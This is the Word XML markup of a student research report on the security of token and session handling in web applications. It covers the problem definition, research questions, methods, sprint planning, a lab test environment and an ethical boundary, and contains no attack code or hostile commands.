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caps/>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Personal Research Project (PRP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A68"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Analysis of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A68"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Token and Session Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A68"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">in Modern Web Applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Living Research Report — Final Version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Andrii Kolodyazhniy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FHICT — Personal Research Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Security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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Document type</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Living research report (replaces standalone project plan)</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Topic</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Token and session handling security in web applications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Current sprint</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4 — Finalised &amp; Delivered</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Version</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v1.0 — Final report</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Date</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4 June 2026</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Author</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Andrii Kolodyazhniy</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Repository</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hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">https://github.com/Sertyg-a11/prp-token-session</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This document is the living research report for the Personal Research Project (PRP) titled "Security Analysis of Token and Session Handling in Modern Web Applications". It consolidates the Sprint 1 project plan, the Sprint 2 design and proof-of-concept work, and structured placeholders for Sprint 3 and Sprint 4. As the project progresses, each sprint chapter is expanded in place, so the same document evolves into the final research report required for assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Background and motivation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern web applications increasingly delegate user authentication to mature identity providers (Auth0, Keycloak, Azure AD, Google), yet most of the security-relevant logic still lives in the application layer: how access tokens are stored in the browser, how session cookies are configured, how the server invalidates a session at logout, and how the application defends against common post-login attacks. In practice this layer is where most exploitable mistakes happen, even when the underlying authentication library is correctly configured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This research investigates that gap. It builds a small but realistic web application, deliberately implements common token and session handling mistakes, demonstrates the resulting attacks in a controlled environment, and then shows the corresponding hardened implementation. The intent is not to break a third-party product but to document, with concrete evidence, why specific implementation choices matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Reading guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapters 2 and 3 contain the formal Sprint 1 deliverables: problem definition, research questions, DOT framework selection, planning, test environment and risks. Chapter 4 is the active Sprint 2 chapter and is the most detailed section of this version of the document; it covers the proof-of-concept architecture, the threat model, and the four attack scenarios that will be implemented and demonstrated. Chapters 5 and 6 contain the agreed structure for Sprint 3 (validation) and Sprint 4 (final findings) and will be filled in during the corresponding sprints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Problem Definition (Sprint 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Problem to solve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern web applications often rely on secure login providers, yet the application layer still introduces vulnerabilities through incorrect handling of access tokens, refresh tokens, cookies, and server sessions. Common mistakes such as unsafe client-side storage, missing cookie protections, weak logout logic, and poor token invalidation can expose authenticated sessions to theft, fixation, replay, or unauthorised reuse. The problem addressed in this project is how these implementation choices create practical security weaknesses after login, even when authentication itself appears correct.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Goals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal of the project is to investigate the security of token and session handling in a controlled web application environment, demonstrate at least one realistic vulnerability scenario, and compare insecure and secure implementation choices. The project should result in a small proof of concept, a structured security analysis, and practical recommendations for safer implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The project includes the design and implementation of a small proof-of-concept web application, the simulation of selected attack scenarios, the comparison of insecure and improved implementations, and a CIA plus basic risk analysis of the identified vulnerabilities. The project does not include enterprise IAM architecture design, a full penetration test of external systems, cloud or infrastructure hardening, or hardware and IoT security research.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scope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Included</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Not included</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Small proof-of-concept web application</w:t>
            </w:r>
          </w:p>
        </w:tc>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Design of full enterprise architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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At least one vulnerable and one improved implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>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Full penetration test of external systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Attack demonstration and defence comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>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Large-scale cloud or infrastructure hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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CIA analysis and basic risk analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>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Hardware or IoT vulnerability research</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Research questions and sub-questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Main research question. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">How secure is token and session handling in modern web applications, and which implementation choices create or reduce vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sub-questions, in research order:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What are the most common vulnerabilities related to token and session handling in web applications?  [Method: Library]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How can insecure storage or transmission of tokens be exploited by an attacker?  [Methods: Library, Lab]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Which attack scenarios are realistic and feasible for a controlled proof of concept, such as token theft, session fixation, or token reuse?  [Methods: Library, Field, Workshop]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What is the security impact of these vulnerabilities on confidentiality, integrity, and availability?  [Methods: Lab, Showroom]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Which defensive measures improve security most effectively without making the implementation unnecessarily complex?  [Methods: Lab, Showroom, Field, Workshop]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Relevant security aspects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The research focuses on secure token storage, secure cookie configuration, session lifecycle management, token invalidation, session fixation prevention, replay resistance, logout handling, confidentiality of authentication data, integrity of session state, and the trade-off between security and implementation complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 Research strategies (DOT framework)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The project uses the DOT framework and intentionally includes at least one method from each required category: Library, Field, Lab, Showroom, and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260"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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DOT category</w:t>
            </w:r>
          </w:p>
        </w:tc>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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Question(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Output</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Library</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Literature review</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Study OWASP guidance, RFCs, browser security guidance, and academic or professional sources on session and token security.</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Q1, Q2, Q3,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Theoretical framework and vulnerability checklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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Field</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Expert / teacher consultation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Discuss feasibility, realism, and professional relevance of selected attack scenarios and mitigations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Q2, Q5</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External feedback and validation of choices</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Lab</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PoC implementation and controlled testing</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Build a small application, implement vulnerable behaviour, execute attack scenarios, then apply improved controls.</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Q2, Q3, Q4,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Practical evidence, test results, and comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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Showroom</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Benchmark / comparative review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Compare insecure and secure implementation variants against best practices such as OWASP recommendations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Q4, Q5</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Structured comparison and justified redesign</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Workshop</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Iterative design review</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Review findings and proposed countermeasures with peers or supervisor to refine the final approach.</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Q3,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Refined decisions and validated recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Methods linked to the sub-questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Literature review of OWASP and comparable professional sources to identify common vulnerabilities and terminology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lab experiments in the proof of concept to observe exploitation of insecure storage and transmission choices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Literature review of the OWASP Testing Guide (OTG-SESS series) and ASVS L1 controls to confirm which scenarios are realistic and lab-feasible; supported by expert feedback and feasibility review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CIA analysis and a basic qualitative risk assessment based on likelihood and impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 5. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Comparative evaluation of mitigations, followed by design review and validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6 Deliverables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A formal research report containing problem definition, research questions, applied DOT methods, findings, CIA analysis, risk analysis, and conclusions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A working proof of concept showing at least one insecure implementation and one improved implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A structured comparison of attack scenarios, observed weaknesses, and effective defensive measures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A presentation and demonstration for class and assessment purposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sprint deliverables required by FHICT, including the project plan, intermediate product version, validation evidence, and final report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Project Planning (Sprint 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Sprint structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The planning is organised in four sprints and fits the PRP structure of define and analyse, design and implement, optimise and validate, and finalise and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760"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Sprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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Specific activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Expected result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Define &amp; analyse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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Finalize topic and scope; refine main question and ordered sub-questions; select DOT methods; prepare project plan; identify target vulnerabilities and safe boundaries for testing.</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Approved project plan and research setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Sprint 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Design &amp; implement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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Design the proof of concept; document architecture and data flow; implement the vulnerable variant; define attack scenarios; perform first controlled tests; collect technical evidence.</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First working product version and initial findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Optimise &amp; validate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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Implement improved controls; compare insecure and secure variants; perform CIA and risk analysis; validate choices using teacher or expert feedback; refine conclusions.</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Validated redesign and analysed results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Sprint 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Finalise &amp; deliver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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Complete the report; prepare the presentation and demo; connect findings to research questions; polish documentation; rehearse the final explanation and defence of choices.</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Final report, presentation, and demonstration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Indicative time allocation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The total project effort is approximately 60 hours. A balanced allocation is 12 hours for Sprint 1, 18 hours for Sprint 2, 16 hours for Sprint 3, and 14 hours for Sprint 4. This distribution keeps the largest effort in implementation and validation while preserving enough time for reporting and presentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Test environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The project requires a safe and isolated test environment inside the SecLab virtual environment. The setup should be sufficient for building and testing a small web application and for executing controlled attack demonstrations without affecting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Required resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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Purpose</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Virtual machine or isolated container environment</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To host the proof-of-concept application and keep experimentation contained.</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Modern web browser with developer tools</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inspect cookies, storage, requests, and token behaviour.</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Application stack (Python, Flask, vanilla JS)</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Lightweight frontend and backend setup suitable for implementing token and session flows.</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HTTPS simulation where feasible</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observe differences between secure and insecure transport assumptions.</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Testing and interception tools</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developer tools and safe HTTP inspection tools used only against the local proof of concept.</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Logging and documentation support</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capture observed behaviour, screenshots, request traces, and test outcomes for the report.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ethical boundary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All testing will be limited to the self-built proof of concept or to explicitly authorised local environments. No testing will be conducted against external systems, production services, or third-party accounts. If any serious vulnerability with broader relevance is unexpectedly identified, responsible disclosure principles will be followed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4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1000"/>
        <w:gridCol w:w="2800"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Risk type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="40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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Mitigation</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Legal / ethical</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Testing could become problematic if performed outside an authorised environment.</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High</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Restrict all experiments to the local PoC and document ethical boundaries clearly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Technical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
